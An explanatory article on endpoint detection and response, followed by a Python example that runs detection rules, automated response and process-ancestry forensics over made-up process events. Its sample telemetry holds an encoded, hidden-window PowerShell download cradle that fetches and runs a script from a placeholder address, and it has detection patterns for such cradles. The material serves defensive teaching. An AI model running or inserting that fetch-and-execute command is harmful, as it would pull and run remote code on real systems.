Endpoint detection and response (EDR), also known as endpoint threat detection and response (ETDR), is an integrated endpoint security solution that combines real-time continuous monitoring and collection of endpoint data with rules-based automated response and analysis capabilities. The term was suggested by Anton Chuvakin at Gartner to describe emerging security systems that detect and investigate suspicious activities on hosts and endpoints, employing a high degree of automation to enable security teams to quickly identify and respond to threats.
The primary functions of an EDR security system are to:
Monitor and collect activity data from endpoints that could indicate a threat
Analyze this data to identify threat patterns
Automatically respond to identified threats to remove or contain them, and notify security personnel
Provide forensics and analysis tools for investigating identified threats and hunting for further suspicious activity
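The four functions above form one pipeline: collect telemetry, analyze it against rules, respond automatically, and give the analyst tools to investigate. The following is an added example, not code from the original article or from any EDR vendor. It models that pipeline over a handful of constructed process-creation events (hostnames, PIDs, users and the 203.0.113.5 address are all made up); the two rules, an Office application spawning a script host and a base64-encoded PowerShell command containing a download cradle, are simplified versions of detections many EDR products ship, and the response step returns a plan rather than calling a real sensor API.

```python
"""Toy EDR pipeline: collect -> analyze -> respond -> investigate (added example)."""
import base64
import re
from dataclasses import dataclass

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}
# -e / -ec / -enc / -EncodedCommand followed by the base64 payload
ENC_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+(\S+)", re.IGNORECASE)


def ps_encode(script: str) -> str:
    """Encode a script the way PowerShell's -EncodedCommand expects (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed process-creation telemetry, roughly what a sensor streams to the backend.
SAMPLE_EVENTS = [
    {"ts": 1, "host": "ws01", "pid": 400, "ppid": 300, "image": "explorer.exe",
     "cmdline": "explorer.exe", "user": "alice"},
    {"ts": 2, "host": "ws01", "pid": 512, "ppid": 400, "image": "winword.exe",
     "cmdline": 'winword.exe "C:\\Users\\alice\\Downloads\\invoice.docm"', "user": "alice"},
    {"ts": 3, "host": "ws01", "pid": 620, "ppid": 512, "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc "
                + ps_encode('IEX (New-Object Net.WebClient).DownloadString("http://203.0.113.5/a.ps1")'),
     "user": "alice"},
    {"ts": 4, "host": "ws02", "pid": 700, "ppid": 650, "image": "powershell.exe",
     "cmdline": "powershell.exe -Command Get-Process", "user": "bob"},  # benign admin use
]


@dataclass
class Alert:
    host: str
    pid: int
    rule: str
    severity: str
    detail: str


def index_by_pid(events):
    """Map (host, pid) -> event so parent processes can be looked up directly."""
    return {(e["host"], e["pid"]): e for e in events}


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if absent or undecodable."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def rule_office_spawns_script_host(event, by_pid):
    """Office document macros rarely have a legitimate reason to launch a script host."""
    parent = by_pid.get((event["host"], event["ppid"]))
    if parent and parent["image"].lower() in OFFICE_APPS and event["image"].lower() in SCRIPT_HOSTS:
        return Alert(event["host"], event["pid"], "office_spawns_script_host", "critical",
                     f'{parent["image"]} -> {event["image"]}')
    return None


def rule_encoded_powershell_download(event, by_pid):
    """Encoded PowerShell is noisy on its own; escalate when the payload is a download cradle."""
    if event["image"].lower() not in {"powershell.exe", "pwsh.exe"}:
        return None
    decoded = decode_encoded_command(event["cmdline"])
    if decoded is None:
        return None
    if re.search(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", decoded, re.IGNORECASE):
        return Alert(event["host"], event["pid"], "encoded_powershell_download", "critical", decoded)
    return Alert(event["host"], event["pid"], "encoded_powershell", "medium", decoded)


RULES = [rule_office_spawns_script_host, rule_encoded_powershell_download]


def analyze(events):
    """Analysis stage: run every rule over every event and return the alerts raised."""
    by_pid = index_by_pid(events)
    return [a for e in events for rule in RULES if (a := rule(e, by_pid))]


def respond(alerts):
    """Response stage: critical alerts kill the process and isolate the host; everything notifies the SOC."""
    actions = set()
    for a in alerts:
        if a.severity == "critical":
            actions.add(f"kill_process:{a.host}:{a.pid}")
            actions.add(f"isolate_host:{a.host}")
        actions.add(f"notify_soc:{a.rule}:{a.host}")
    return sorted(actions)  # a set so one host is isolated once, however many rules fired


def process_ancestry(events, host, pid):
    """Forensics helper: walk parent links back to the root of the recorded tree, oldest first."""
    by_pid, chain, seen = index_by_pid(events), [], set()
    while (host, pid) in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[(host, pid)]["image"])
        pid = by_pid[(host, pid)]["ppid"]
    return list(reversed(chain))


if __name__ == "__main__":
    found = analyze(SAMPLE_EVENTS)
    for a in found:
        print(a.severity, a.rule, a.host, a.pid, process_ancestry(SAMPLE_EVENTS, a.host, a.pid))
    print(respond(found))
```

Running it flags only the ws01 PowerShell process (both rules fire on it), isolates ws01 once, and leaves bob's interactive `Get-Process` on ws02 alone; the ancestry helper reconstructs the explorer.exe -> winword.exe -> powershell.exe chain an analyst would want when triaging the alert. Real products do the same three things at much larger scale: the sensor enriches each event with parent lineage at collection time, rules are expressed in a query language rather than Python, and the response actions are issued to the agent over the management channel.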